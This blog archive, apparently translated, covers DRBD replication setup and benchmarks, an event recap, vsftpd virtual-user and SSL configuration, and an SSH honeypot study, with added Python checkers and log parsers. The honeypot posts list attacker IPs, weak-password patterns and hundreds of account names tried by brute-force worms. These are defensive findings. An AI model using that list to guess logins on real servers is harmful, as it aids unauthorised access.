ns:0 nr:0 dw:0 dr:0 al:0 bm:0 lo:0 pe:0 ua:0 ap:0
resync: used:0/61 hits:0 misses:0 starving:0 dirty:0 changed:0
act_log: used:0/257 hits:0 misses:0 starving:0 dirty:0 changed:0
=====State seen in /proc/drbd: not y
et synchronised, hence Inconsistent/Inconsistent=====

9. Start the initial sync of r0 and make NODE-A primary
Synchronise using NODE-A's data as the source
NODE-A# drbdadm -- --overwrite-data-of-peer primary r0
/dev/VG0/LVDRBD, where r0 lives, is 2G, so the initial sync takes a while; because /etc/drbd.conf sets syncer { rate 10M; }, capping sync bandwidth at 10MBps (80Mbps), the 2G of data took about three minutes twenty seconds

/proc/drbd on NODE-B during the sync
NODE-B# cat /proc/drbd
version: 8.0.13 (api:86/proto:86)
GIT-hash: ee3ad77563d2e87171a3da17cc002ddfd1677dbe build by phil@fat-tyre, 2008-08-04 15:28:07
0: cs:SyncTarget st:Secondary/Primary ds:Inconsistent/UpToDate C r---
ns:0 nr:1842176 dw:1842176 dr:0 al:0 bm:112 lo:0 pe:0 ua:0 ap:0
[================>...] sync'ed: 87.9% (254876/2097052)K
finish: 0:00:23 speed: 10,984 (10,288) K/sec
resync: used:0/61 hits:115023 misses:113 starving:0 dirty:0 changed:113
act_log: used:0/127 hits:0 misses:0 starving:0 dirty:0 changed:0

/proc/drbd on NODE-A after the sync
NODE-A# cat /proc/drbd
version: 8.0.13 (api:86/proto:86)
GIT-hash: ee3ad77563d2e87171a3da17cc002ddfd1677dbe build by phil@fat-tyre, 2008-08-04 15:28:07
0: cs:Connected st:Primary/Secondary ds:UpToDate/UpToDate C r---
ns:2097052 nr:0 dw:0 dr:2097052 al:0 bm:128 lo:0 pe:0 ua:0 ap:0
resync: used:0/61 hits:130938 misses:128 starving:0 dirty:0 changed:128
act_log: used:0/127 hits:0 misses:0 starving:0 dirty:0 changed:0
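Reading /proc/drbd by hand is fine for a test, but on a replicated pair the states that matter (connected, and UpToDate on both sides) should be checked by something that runs unattended. The following Python example is added here and is not DRBD's code nor part of the original notes; it parses the DRBD 8.0 resource line shown above ('cs:' connection state, 'st:' roles, 'ds:' disk states, the sync'ed percentage while syncing) and reports anything that is not Connected and UpToDate/UpToDate. The three sample texts are constructed from the output in these notes; a StandAlone sample is included because a node that has lost its peer is exactly the case a monitoring check exists for.

```python
import re

# Constructed /proc/drbd samples, following the DRBD 8.0.13 layout shown in these
# notes. In 8.0 the role field is labelled "st:" (later releases call it "ro:").
PROC_DRBD_SYNCING = """version: 8.0.13 (api:86/proto:86)
 0: cs:SyncTarget st:Secondary/Primary ds:Inconsistent/UpToDate C r---
    ns:0 nr:1842176 dw:1842176 dr:0 al:0 bm:112 lo:0 pe:0 ua:0 ap:0
        [================>...] sync'ed: 87.9% (254876/2097052)K
        finish: 0:00:23 speed: 10,984 (10,288) K/sec
"""
PROC_DRBD_SYNCED = """version: 8.0.13 (api:86/proto:86)
 0: cs:Connected st:Primary/Secondary ds:UpToDate/UpToDate C r---
    ns:2097052 nr:0 dw:0 dr:2097052 al:0 bm:128 lo:0 pe:0 ua:0 ap:0
"""
PROC_DRBD_STANDALONE = """version: 8.0.13 (api:86/proto:86)
 0: cs:StandAlone st:Primary/Unknown ds:UpToDate/DUnknown   r---
    ns:0 nr:0 dw:0 dr:0 al:0 bm:0 lo:0 pe:0 ua:0 ap:0
"""

RESOURCE_LINE = re.compile(
    r"^\s*(\d+):\s+cs:(\S+)\s+st:(\S+)/(\S+)\s+ds:(\S+)/(\S+)", re.M)
SYNC_PCT = re.compile(r"sync'ed:\s*([\d.]+)%")

def parse_proc_drbd(text):
    """Return {minor: {cs, role, peer_role, disk, peer_disk, sync_percent}}."""
    matches = list(RESOURCE_LINE.finditer(text))
    resources = {}
    for i, m in enumerate(matches):
        # the lines belonging to this resource run up to the next resource line
        end = matches[i + 1].start() if i + 1 < len(matches) else len(text)
        pct = SYNC_PCT.search(text[m.end():end])
        resources[int(m.group(1))] = {
            "cs": m.group(2), "role": m.group(3), "peer_role": m.group(4),
            "disk": m.group(5), "peer_disk": m.group(6),
            "sync_percent": float(pct.group(1)) if pct else None,
        }
    return resources

def drbd_problems(text, expected_role=None):
    """Human-readable problems; an empty list means every resource is Connected
    with both disks UpToDate (and in the expected role, if one is given)."""
    resources = parse_proc_drbd(text)
    if not resources:
        return ["no DRBD resource lines found"]
    problems = []
    for minor, r in sorted(resources.items()):
        if r["cs"] != "Connected":
            problems.append(f"drbd{minor}: connection state {r['cs']}")
        if r["disk"] != "UpToDate" or r["peer_disk"] != "UpToDate":
            problems.append(f"drbd{minor}: disk states {r['disk']}/{r['peer_disk']}")
        if expected_role and r["role"] != expected_role:
            problems.append(f"drbd{minor}: role {r['role']}, expected {expected_role}")
    return problems

if __name__ == "__main__":
    for name, sample in [("syncing", PROC_DRBD_SYNCING), ("synced", PROC_DRBD_SYNCED),
                         ("standalone", PROC_DRBD_STANDALONE)]:
        print(name, drbd_problems(sample) or "OK")
```

Run against the live file with `drbd_problems(open("/proc/drbd").read(), expected_role="Primary")` on the node that is supposed to hold the mount; a non-empty list is what a cron job or monitoring agent should alert on.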

After the sync, the eth1 NIC used by DRBD
NODE-A:~# ifconfig eth1
eth1 Link encap:Ethernet HWaddr 00:0C:29:68:EC:2C
inet addr:192.168.100.101 Bcast:192.168.100.254 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:659296 errors:0 dropped:0 overruns:0 frame:0
TX packets:1502254 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:47778966 (45.5 MiB) TX bytes:2248845944 (2.0 GiB)
Interrupt:177 Base address:0x1480

NODE-B:~# ifconfig eth1
eth1 Link encap:Ethernet HWaddr 00:0C:29:D3:37:A3
inet addr:192.168.100.102 Bcast:192.168.100.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1502140 errors:12 dropped:18 overruns:0 frame:0
TX packets:659298 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2248686736 (2.0 GiB) TX bytes:47778708 (45.5 MiB)
Interrupt:177 Base address:0x1480

You can see that NODE-A sent 2G of data to NODE-B

10. Create a file system on NODE-A (primary); I used XFS
NODE-A:~# mkfs.xfs /dev/drbd0
meta-data=/dev/drbd0 isize=256 agcount=8, agsize=65532 blks
= sectsz=512 attr=0
data = bsize=4096 blocks=524256, imaxpct=25
= sunit=0 swidth=0 blks, unwritten=1
naming =version 2 bsize=4096
log =internal log bsize=4096 blocks=2560, version=1
= sectsz=512 sunit=0 blks
realtime =none extsz=65536 blocks=0, rtextents=0

11. On NODE-A (primary), mount /dev/drbd0 on /DRBD
NODE-A:~# mount /dev/drbd0 /DRBD
NODE-A:~# df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/VG0-LVROOT
4184064 609632 3574432 15% /
tmpfs 258408 0 258408 0% /lib/init/rw
udev 10240 52 10188 1% /dev
tmpfs 258408 0 258408 0% /dev/shm
/dev/sda1 241116 13240 215428 6% /boot
/dev/drbd0 2086784 288 2086496 1% /DRBD

12. Test large-file (1G) write speed on NODE-A (primary)
Writing 1G of data to the LOCAL DISK took 2.69529 seconds (the VM's DISK CACHE is suspected of speeding this up)
NODE-A:~# dd if=/dev/zero of=/TEST_1G bs=1M count=1000
1000+0 records in
1000+0 records out
1048576000 bytes (1.0 GB) copied, 2.69529 seconds, 389 MB/s
Writing 1G of data to DRBD took 10.8353 seconds
NODE-A:~# dd if=/dev/zero of=/DRBD/TEST_1G bs=1M count=1000
1000+0 records in
1000+0 records out
1048576000 bytes (1.0 GB) copied, 10.8353 seconds, 96.8 MB/s

CPU usage on NODE-B (secondary) during the write
Tasks: 55 total, 3 running, 52 sleeping, 0 stopped, 0 zombie
Cpu(s): 0.0%us, 5.3%sy, 0.0%ni, 53.0%id, 0.0%wa, 7.2%hi, 34.5%si, 0.0%st
Mem: 516820k total, 36056k used, 480764k free, 368k buffers
Swap: 498004k total, 0k used, 498004k free, 20104k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2333 root 16 0 0 0 0 R 69 0.0 1:09.22 drbd0_receiver
2338 root -3 0 0 0 0 S 0 0.0 0:00.56 drbd0_asender
1 root 15 0 1948 648 552 S 0 0.1 0:02.43 init

On the secondary you can see
5.3%sy -- System CPU time
7.2%hi -- Hardware IRQ
34.5%si -- Software Interrupts

eth1 traffic on NODE-B (secondary), observed with iptraf while the 1G of data was written to DRBD
Peak total activity: 623426.88 kbits/s, 76228.80 packets/s
Peak incoming rate: 609721.00 kbits/s, 50648.00 packets/s
Peak outgoing rate: 14150.92 kbits/s, 25580.80 packets/s

The VM Host-Only NIC can run at more than 500Mbps

13. Test writing 1000 small 1M files on NODE-A (primary)
First create a 1M file
NODE-A:~# dd if=/dev/zero of=/tmp/0 bs=1M count=1
Copy this 1M file 1000 times in a while loop
NODE-A:~# date ;i=1;while [ $i -le 1000 ] ; do cp /tmp/0 /DRBD/$i; i=$[$i+1]; done;date
Thu Oct 2 23:14:00 CST 2008
Thu Oct 2 23:14:10 CST 2008
The timestamps show it took 10 seconds

eth1 traffic on NODE-B (secondary), observed with iptraf
Peak total activity: 674872.19 kbits/s, 82699.00 packets/s
Peak incoming rate: 659846.19 kbits/s, 54869.80 packets/s
Peak outgoing rate: 15513.48 kbits/s, 27829.20 packets/s

14. Make NODE-A secondary and let NODE-B be primary
First unmount /dev/drbd0 on NODE-A
NODE-A:~# umount /DRBD
NODE-A:~# drbdadm secondary r0
On NODE-B, make it primary and mount it on /DRBD
NODE-B:~# drbdadm primary r0
NODE-B:~# mount /dev/drbd0 /DRBD
NODE-B:~# df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/VG0-LVROOT
4184064 500296 3683768 12% /
tmpfs 258408 0 258408 0% /lib/init/rw
udev 10240 52 10188 1% /dev
tmpfs 258408 0 258408 0% /dev/shm
/dev/sda1 241116 13240 215428 6% /boot
/dev/drbd0 2086784 1024564 1062220 50% /DRBD

Because the test ran on VMs rather than physical machines there may be discrepancies, so the results are for reference only.
DRBD documentation: http://www.drbd.org/users-guide/users-guide.html

2008-08-04

2008-08-03 Punch Party 6 In BoF: an incomplete video record

It is called an incomplete video record because during filming the third-party battery, which had shown a full charge, suddenly died while Xdite was speaking.. 囧rz/ I had to charge the just-drained original battery on the spot,
so only the beginning of Xdite's part is on video..!! Sorry.. Xdite ..

Opening by 凱洛


Part 1. 喬敬 - blogger & ".blog"


Part 2. Xdite - blogger & I want to be famous!
Very sorry, only the opening part....


Part 3. KJ - blogger & Wikipedia
Moe-god KJ.. the archery photo at the end is super cool



Part 4. 林彥傑 - blogger & putting Taiwan's 319 townships on the international map


Part 5. Isaac Mao - blogger & 草莓媒體 (Strawberry Media)
Because of the cross-strait network connection there was some LAG for a short while
part 5-1

part 5-2


Part 6. 無敵小恩恩 - blogger & his hot-blooded summer round-the-island record
part 6-1 Super hot-blooded, moving..

part 6-2 Questions from the floor..


Part 7. Freddy - blogger & his baby



Part 8. 朱學恆 - blogger & 阿宅筆記本 (Otaku Notebook)
part 8-1 The Uruk-hai lives up to his name. Switching projector screens left my tripod useless, so I had to move quickly and shoot hand-held from another direction; holding a DV camera for that long makes your arm ache, so it shakes quite a bit..


part 8-2 The final theme: doing one silly thing every day can change the world!

Original video: Where the Hell is Matt? (2008)

Borrowing what asdic said on plurk: the video 朱學恆 played in the evening was quite moving; you don't need a university or master's degree to write a Blog, you don't need specialist knowledge or experience to write a Blog. Bloggers, "if you believe you can do it, you can do it." Cheers to all the Bloggers working hard together


Thanks to 凱洛.. all the speakers....
and all the staff who worked hard to bring us such a great PP6..
I missed the beer at the break XD, but the registration fee was already worth it

Also attached: Y!Live screenshots from the BOF opening in the small hours of 08-03
BoF opening Y!Live screenshot set 1
capture_03082008_003415


BoF opening Y!Live screenshot set 2
capture_20080803012900

BoF opening Y!Live screenshot set 3
capture_20080803013753


==================================================
PS: Quietly at the back of the PP6 venue appeared the Webi Show Girl & director Storm, who had come over after the computer expo ended;
it seems hardly anyone noticed a Show Girl was present..XD


2008-07-07

[Notes] VSFTPD virtual users and SSL encryption on Debian

Install libpam-pwdfile
apt-get install libpam-pwdfile

Create a dedicated PAM service for vsftpd virtual users (vsftpd_vusers)
/etc/pam.d/vsftpd_vusers
# Customized login using htpasswd file
auth required pam_pwdfile.so pwdfile /etc/vsftpd/passwd
account required pam_permit.so

Use Apache's htpasswd to create the account/password file

htpasswd -c /etc/vsftpd/passwd USERA
htpasswd /etc/vsftpd/passwd USERB
chmod 600 /etc/vsftpd/passwd

Create user_list
/etc/vsftpd/user_list
USERA
USERB

Create per-ACCOUNT directories/permissions

/etc/vsftpd/user/USERA
local_root=/PATH/TO/USERA/ACCESS

/etc/vsftpd/user/USERB
local_root=/PATH/TO/USERB/ACCESS
guest_username=REAL_USER_ACCOUNT
local_umask=002

Create the SSL key

openssl req -x509 -nodes -days 730 -newkey rsa:1024 -keyout /etc/vsftpd/vsftpd.pem -out /etc/vsftpd/vsftpd.pem

/etc/vsftpd.conf

pasv_min_port=xxxxx
pasv_max_port=yyyyy
listen_port=zz
anonymous_enable=NO
local_enable=YES
write_enable=YES
local_umask=022
userlist_deny=NO
userlist_file=/etc/vsftpd/user_list
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd/user_list
xferlog_enable=YES
dual_log_enable=YES
connect_from_port_20=YES
xferlog_std_format=YES
listen=YES
tcp_wrappers=YES
## VUSER ##
pam_service_name=vsftpd_vusers
user_config_dir=/etc/vsftpd/user
virtual_use_local_privs=YES
guest_enable=YES
secure_chroot_dir=/var/run/vsftpd
hide_ids=YES
## SSL ##
ssl_enable=YES
force_local_data_ssl=no
force_local_logins_ssl=YES
ssl_tlsv1=YES
rsa_cert_file=/etc/vsftpd/vsftpd.pem
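As a complement to the configuration above, here is an added Python example (not vsftpd's code and not part of the original notes) that parses a vsftpd.conf fragment and flags the settings a reviewer would query. Run over the settings above it reports one item: force_local_data_ssl=no, which leaves data transfers unencrypted even though logins are forced over SSL. The two config fragments are constructed; the values assumed for absent options are the vsftpd defaults as documented in its man page, and are marked as assumptions in the code.

```python
# Two constructed /etc/vsftpd.conf fragments. NOTES_CONF repeats the SSL and
# virtual-user settings from these notes; WEAK_CONF is a deliberately weakened
# variant. All option names are real vsftpd options.
NOTES_CONF = """anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd/user_list
pam_service_name=vsftpd_vusers
guest_enable=YES
ssl_enable=YES
force_local_data_ssl=no
force_local_logins_ssl=YES
ssl_tlsv1=YES
rsa_cert_file=/etc/vsftpd/vsftpd.pem
"""
WEAK_CONF = """# anonymous_enable deliberately left unset
local_enable=YES
guest_enable=YES
ssl_enable=YES
ssl_sslv3=YES
force_local_logins_ssl=NO
"""

def parse_vsftpd_conf(text):
    """vsftpd.conf is one 'option=value' per line; '#' starts a comment line."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            conf[key.strip().lower()] = value.strip()
    return conf

def enabled(conf, key, default):
    """vsftpd booleans are YES/NO, case-insensitive. 'default' is the value assumed
    when the option is absent (assumption: the man-page default for that option)."""
    return conf.get(key, default).upper() == "YES"

def audit_vsftpd(conf):
    """Return a list of findings; an empty list means nothing here to query."""
    findings = []
    if enabled(conf, "anonymous_enable", "YES"):
        findings.append("anonymous_enable is YES (or unset, which vsftpd treats as YES)")
    if not enabled(conf, "ssl_enable", "NO"):
        findings.append("ssl_enable is not YES: logins and data travel in the clear")
    else:
        if not enabled(conf, "force_local_logins_ssl", "YES"):
            findings.append("force_local_logins_ssl is not YES: passwords may be sent unencrypted")
        if not enabled(conf, "force_local_data_ssl", "YES"):
            findings.append("force_local_data_ssl is not YES: data connections may be sent unencrypted")
        for old in ("ssl_sslv2", "ssl_sslv3"):
            if enabled(conf, old, "NO"):
                findings.append(f"{old} is YES: obsolete protocol enabled")
    # virtual users should be confined: either chroot everyone or use the chroot list
    if enabled(conf, "guest_enable", "NO") and not (
            enabled(conf, "chroot_local_user", "NO") or enabled(conf, "chroot_list_enable", "NO")):
        findings.append("virtual users enabled without chroot_local_user or chroot_list_enable")
    return findings

if __name__ == "__main__":
    for name, text in [("notes", NOTES_CONF), ("weak", WEAK_CONF)]:
        print(name, audit_vsftpd(parse_vsftpd_conf(text)) or "OK")
```

The NOTES_CONF finding is the trade-off the notes make explicitly (force_local_data_ssl=no, presumably for client compatibility); the script just makes sure that choice stays visible rather than silently surviving the next edit of the file.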

2008-05-30

Passwords collected from SSH intrusion attempts

After the SSH brute-force intrusion attempt I logged last time,
I made a simple modification to the openssh CODE so that it writes every password the CLIENT enters to the LOG while refusing all logins, and used this fake sshd as bait to see how many ssh worms it would catch.
The statistics after one week (5/24~5/30) of logging are as follows:

Attacking IP / number of attempts / location (looked up via www.ip138.com)
117.129.0.111 -- 116 China Mobile
123.129.247.32 -- 734 Shandong, China (Netcom)
140.134.140.22 -- 16 Taiwan, Feng Chia University
203.198.69.66 -- 392 Hong Kong
210.57.230.22 -- 24 South Korea
217.167.130.37 -- 69 France
219.139.190.249 -- 22 Xiangfan, Hubei, China (Telecom)
222.122.161.12 -- 62 South Korea
222.190.109.118 -- 1202 Nanjing, Jiangsu, China (Telecom)
222.35.136.30 -- 291 Beijing, China (Tietong)
58.211.78.204 -- 6 Suzhou, Jiangsu, China (Telecom)
58.61.149.180 -- 424 Shenzhen, Guangdong, China (Telecom)
59.125.163.62 -- 248 Taiwan, Chunghwa Telecom
59.180.240.3 -- 16 India
60.191.123.40 -- 16 Hangzhou, Zhejiang, China (Telecom)
60.220.248.57 -- 833 Jincheng, Shanxi, China (Netcom)
60.250.62.47 -- 9 Taiwan, Chunghwa Telecom

From the data collected so far, several particularly dangerous conditions stand out:

1. SSH left on the default port & root login not restricted.
2. Account is a common English first name with the same string as the password (certain death)
3. Passwords that are far too simple; the known patterns I could identify are
a. common dictionary words
b. repeated digits (ex: 11111111 , 33333333)
c. sequential digits (ex: 123 , 1234 , 987654321)
d. sequential symbols (ex: !@#$% , !@#$%^&*() , )(*&^%$#@! )
e. keyboard-order letters (ex: qwerty , asdfgh , 1qaz2wsx3edc4rfv , 3edc4rfv5tgb)
f. simple character substitutions (ex: r@@t , p@ssw0rd )
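The patterns listed above can be turned into a checker an administrator runs over proposed passwords (or over an existing user list) before they reach sshd. The following Python example is added here and is not code from the original post: it implements rules a to f plus the password-equals-account case from point 2. The word list is a tiny constructed sample (a real check would use a full dictionary and the account names from the log), the keyboard rows and columns assume a US QWERTY layout, and the "repeated" rule is generalised from repeated digits to any repeated character.

```python
import itertools
import re

# Small constructed word list; a real check would use a full dictionary plus
# the account names seen in the honeypot log.
COMMON_WORDS = {"password", "root", "admin", "test", "guest", "user", "welcome",
                "letmein", "secret", "login", "master", "abc"}
DIGIT_RUN = "01234567890"      # "1234", "7890", "0987654321" are substrings (or reversed)
SYMBOL_RUN = "!@#$%^&*()"      # shifted number row; reversed gives ")(*&^%$#@!"
KEY_RUNS = ["qwertyuiop", "asdfghjkl", "zxcvbnm",                       # US QWERTY rows
            "1qaz", "2wsx", "3edc", "4rfv", "5tgb", "6yhn", "7ujm"]     # and columns
LEET = {"@": "ao", "0": "o", "1": "il", "3": "e", "4": "a", "5": "s", "$": "s", "7": "t", "!": "i"}

def in_run(pw, run, minlen=3):
    """True if the whole password is a substring (forwards or backwards) of one run."""
    return len(pw) >= minlen and (pw in run or pw in run[::-1])

def covered_by_runs(pw, runs, minlen=3):
    """True if the password splits entirely into pieces of at least minlen
    characters, each a substring (either direction) of one of the runs."""
    n = len(pw)
    reach = [False] * (n + 1)
    reach[0] = True
    for i in range(n):
        if not reach[i]:
            continue
        for run in runs:
            for length in range(minlen, n - i + 1):
                piece = pw[i:i + length]
                if piece in run or piece in run[::-1]:
                    reach[i + length] = True
                else:
                    break   # a longer piece cannot match if its prefix does not
    return reach[n]

def leet_variants(pw, limit=8):
    """Expand each substitutable character back to its letters (p@ssw0rd -> password)."""
    if sum(1 for c in pw if c in LEET) > limit:
        return set()
    choices = [LEET[c] if c in LEET else c for c in pw]
    return {"".join(v) for v in itertools.product(*choices)}

def classify(password, username=None):
    """Return the names of the weak patterns the password matches ([] if none)."""
    pw = password.lower()
    hits = []
    if pw in COMMON_WORDS:
        hits.append("common word")
    if re.fullmatch(r"(.)\1{2,}", pw):
        hits.append("repeated character")
    if in_run(pw, DIGIT_RUN):
        hits.append("sequential digits")
    if in_run(pw, SYMBOL_RUN):
        hits.append("sequential symbols")
    if covered_by_runs(pw, KEY_RUNS):
        hits.append("keyboard walk")
    if pw not in COMMON_WORDS and any(v != pw and v in COMMON_WORDS for v in leet_variants(pw)):
        hits.append("leet substitution of a common word")
    if username is not None and pw == username.lower():
        hits.append("same as username")
    return hits

if __name__ == "__main__":
    for sample in ["11111111", "987654321", ")(*&^%$#@!", "1qaz2wsx3edc4rfv", "r@@t", "p@ssw0rd"]:
        print(sample, classify(sample))
    print("admin/admin", classify("admin", username="admin"))
```

Every sample in the `__main__` block comes from the rule list above; the checker is deliberately conservative (a pattern must account for the whole password) so that it flags exactly the shapes seen in the log rather than anything that merely contains "123".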

Some security recommendations for sshd:

1. If possible, change the port; don't use the default TCP/22
2. Don't allow root login (PermitRootLogin no)
3. Where feasible, use AllowUsers to whitelist the accounts permitted to log in over SSH
4. Disable PasswordAuthentication altogether and use authentication key verification instead

Below are the detailed account/password data compiled from the log;
you may want to search for the password your own SSH uses in this list.. and if it is there.. Amitabha..

A total of 825 accounts were used in the intrusion attempts
1 a aaliyah aaron abby abigail absurdir_deadphp adam adi adine adm admin administrator admins admissions adrian aecpro agent ahmed aidan ajith akihisa akino akira alan albert alberto alex alexa alexander alexandra alexandru alexis alfred ali alias alice alin alka allan allen alliance allison almacen alumni alyssa amanda amavisd amber amelia ana andi andrea andreea andrei andres andrew andy angel angela angie anita ann anna anonymous anthony anton apache apple apple1 apples appowner appserver arbaiah arbgirl_phpbb1 areyes arianna armen aron arthur ashley ashlyn asia asterisk atria atsumi audio audrey austin autumn ava avery azuma baba backuppc bailey balykin bandit bane barbara bart basic bauer bear beavis beginner ben benjamin beny bernard bernd bert bessel bill billy bind bird bisson black blog bnc bob bobby bogdan boon boss brandon bret brett brian brianna brooke brooklyn bruce bryan build buster caleb cameron cap carl carlos carly carol caroline carshowguide cassie cesar cgi ch chad chandimal charlott chicago Chicago china chipmast chloe chorist chris Christ christopher cindy cjohnson claire clamav clark client clinic clinton clock closas coco cocolino connor control copier core corinna courier courtney craig cristi cvs cvsuser cyp cyrus cyrusimap dakota Dakota dan dana daniel daniela danielle dank danny dark data dave david db de dean debbie default delta demo denis der design destiny dev devilsins dexter diane dick dima dino director displays doming doodz dovecot download duckie dujoey dust dylan dyndns earl economist ed eddie edgar edward elena elisa eliza elizabeth ella ellen emil emily emma enzo eppc eric erin ernie etc ethan ethereal eugen eva export fabio fabrice factoria faith falcon faridah farrell fauzi fedora felix fester festival file files filip filippid_admin finder first flower fly france francis francois frank franklin fred freeze frei friends ftp ftp123 ftphome ftpuser gabi gabriella gabrielle gary gast gemma generalmanager genoveva george gerry 
gigi ginger girl godzilla grace gracie gt05 guest guest1 guest10 guest2 guest3 guest4 guest5 guest6 guest7 guest8 guest9 guinness guset gwen hack hacker hailey hallo halt hammer hannah hans harley harris harry harvey hatton hera hermes hiperg http httpd huang huercal hugues ian ident iesse im image india info informix install instrume internet invite ioana ionut iraf iresha isabella isabelle ismail it its jabber jack jackson jacob jacuna jada james japan jasmine jason jatema javi jayden jboss je jean jeff jeffrey jenna jennan jerry jesse jessica jillian jim jimmy jking jnanchito joanna joeflores joerg john johny jonathan jordan Jordan joseph josh joshua Joshua juan judith julia jun junior jupiter justin Justin kaitlyn karika karl kate katherine katie kay kayla kaylee kelly ken kendall kennedy kevin kim kjayroe klog knoppix kor kristen kristin kylie lab lahiru larry lauren laurent laurentiu ldap leah lebedev lee lemancaf_leman library lillian lily linda lindsey linux linuxtest linuxtester linuxtester2 lisa listen liz lloyd logan louise louise1 luc ludovic lyn mackenzie madeline madhuri madison magazine maggie magic mailman makayla malika mama manchester marcus maria mario marissa mark martin martinez marvin mary maryse master math matilda matt matthew maurice max may maya mckenna megan mia michael michaels michal michel michey mickey miguel mihai mike miller mirc molly mom mona monica monique moon morgan mortimer moshutzu mouse movie movies mri murray mustang myra myrhodesiaiscom mysql nadia nagios named natalie nathan neetha netadmin new newsletter newsroom nicholas nick nickelan nicole Nicole noah nokia notused nuucp o2 office oliver olivia operator oracle orange oscar paige paintball paintball1 party pascal pass password patrick paul peewee penelope pete peter petru peyton pgsql phil philip photo physics pico plant plasma poczta pop porno postgres postmaster princess production project pub public purple qtss quincy raider randi ranjith rasika reagan rebecca 
reboot recruit remote research resin restart retsu rexmen rfmngr richard riley rob robert Robert rock roland rolo ronald root rosa rpm rtorres russ ryan safetp sakura sales samantha samba samir sammy samuel sandra sangley_xmb1 sara sarah sasha savannah save sbear scan scorpion sean search securityagent semenov senaka seoulselection serge server service sgi sham sharon shaun shelby shell shelton shop shuri shutdown sid sierra signalhill simon sirsi skkb sky skylar sll sm sme smmsp snoopy sonny sophia sophie soporte spam spamd spider spike sponsor squid ssh staff stats stella stephanie stephen steve steven stud student students sunny superman support support123 susan sven svn swsoft sya sybase sydney sylvia system tachel tads takada tara taylor ted telnet telnetd temp temporal terry test test1 test10 test11 test12 test123 test2 test3 test4 test5 test6 test7 test8 test9 teste tester testing testuser thaiset theo thomas tigger tim tino tip tmp tokend tom tomas tomcat tomcat5 tone tony toto tracker transfer trash travel_phpb1 trinity ts tweety tyler ubuntu ueda ultra unix unknown updates user user1 user123 username users valas valentin valerie vanesa vanessa vdi venom ventas vermont vic vicky victoria video vincent viorel viper virginia virus visitor vivek vmware vnc vwalker walker wallimo_phpbb1 walter wang wanker web webadmin webcam webmaster webpop wei white wilkins will wille william williamson willie win windowserver wolfgang workshop wrestling www www1 wwwdata wwwrun xbox xgridagent xgridcontroller xtra xxx zachary zena zimbra zoe

Across all login attempts, 2038 distinct passwords were tried.


2008-05-23

A logged SSH brute-force intrusion attempt

On the afternoon of 2008-5-23 I suddenly felt like running an experiment: put a virtual machine (VM) on a public IP, open the ssh server's TCP/22 port to the outside, and see how long it takes before someone comes to TRY it.
(My habit after installing a system is to move SSH off TCP/22 to a high port; anyone who wants to scan ports can scan slowly.)
The result: in under 6 hours I caught an IP attempting to break in.
The LOG recorded is as follows:
May 23 19:52:06 __ sshd[3515]: Did not receive identification string from 59.125.163.62
19:52:06: the first packet, testing whether TCP/22 is open
May 23 20:12:36 __ sshd[3521]: User root from 59-125-163-62.hinet-ip.hinet.net not allowed because not listed in AllowUsers
May 23 20:12:36 __ sshd[3521]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=59-125-163-62.hinet-ip.hinet.net user=root
May 23 20:12:38 __ sshd[3521]: Failed password for invalid user root from 59.125.163.62 port 33779 ssh2
Then from 20:12:36 it started trying passwords for the root account; it tried 120 times.
After that it tried another 244 times with other accounts, and the whole password-guessing run did not end until 20:38:52.
The statistics of the accounts tried are as follows:
root 120 times, lady 4 times, anca 2 times, dana 2 times, personal 2 times, radu 2 times
The rest were accounts tried only once each.

(A pity I didn't modify sshd to log the passwords it tried; some day I'll hack the sshd code for fun.)
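The tally the post gives by hand (tries per account, first probe, start and end of the run) can be produced from the sshd log lines directly. The script below is an added example, not the post's own code; the log lines it parses are constructed in the same syslog format as the ones quoted above (the first two are copied from the post, the rest are made up).

```python
import re
from collections import Counter
from datetime import datetime

# Syslog prefix as in the quoted lines ("__" stands for the masked hostname).
_PREFIX = r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
PROBE_RE = re.compile(
    _PREFIX + r"Did not receive identification string from (?P<ip>[\d.]+)$")
FAILED_RE = re.compile(
    _PREFIX + r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$")

# Constructed sample: first two lines are the post's, the rest are made up
# so that one source tries root three times, lady twice and anca once.
SAMPLE_LOG = """\
May 23 19:52:06 __ sshd[3515]: Did not receive identification string from 59.125.163.62
May 23 20:12:36 __ sshd[3521]: User root from 59-125-163-62.hinet-ip.hinet.net not allowed because not listed in AllowUsers
May 23 20:12:38 __ sshd[3521]: Failed password for invalid user root from 59.125.163.62 port 33779 ssh2
May 23 20:12:41 __ sshd[3523]: Failed password for invalid user root from 59.125.163.62 port 33802 ssh2
May 23 20:12:44 __ sshd[3525]: Failed password for invalid user root from 59.125.163.62 port 33830 ssh2
May 23 20:13:02 __ sshd[3527]: Failed password for invalid user lady from 59.125.163.62 port 33901 ssh2
May 23 20:13:05 __ sshd[3529]: Failed password for invalid user lady from 59.125.163.62 port 33922 ssh2
May 23 20:38:52 __ sshd[3601]: Failed password for invalid user anca from 59.125.163.62 port 40110 ssh2
May 23 21:04:10 __ sshd[3640]: Accepted publickey for admin from 192.0.2.10 port 50000 ssh2
""".splitlines()


def parse_ts(ts, year):
    """Syslog timestamps carry no year, so the caller supplies it."""
    return datetime.strptime(f"{year} {' '.join(ts.split())}", "%Y %b %d %H:%M:%S")


def summarize(lines, year=2008):
    """Group sshd events by source IP: failed tries per user plus timing.

    Lines that are neither a bare connection probe nor a failed password
    (pam_unix, AllowUsers, Accepted ...) are ignored.
    """
    stats = {}
    for line in lines:
        line = line.rstrip("\n")
        m = PROBE_RE.match(line) or FAILED_RE.match(line)
        if not m:
            continue
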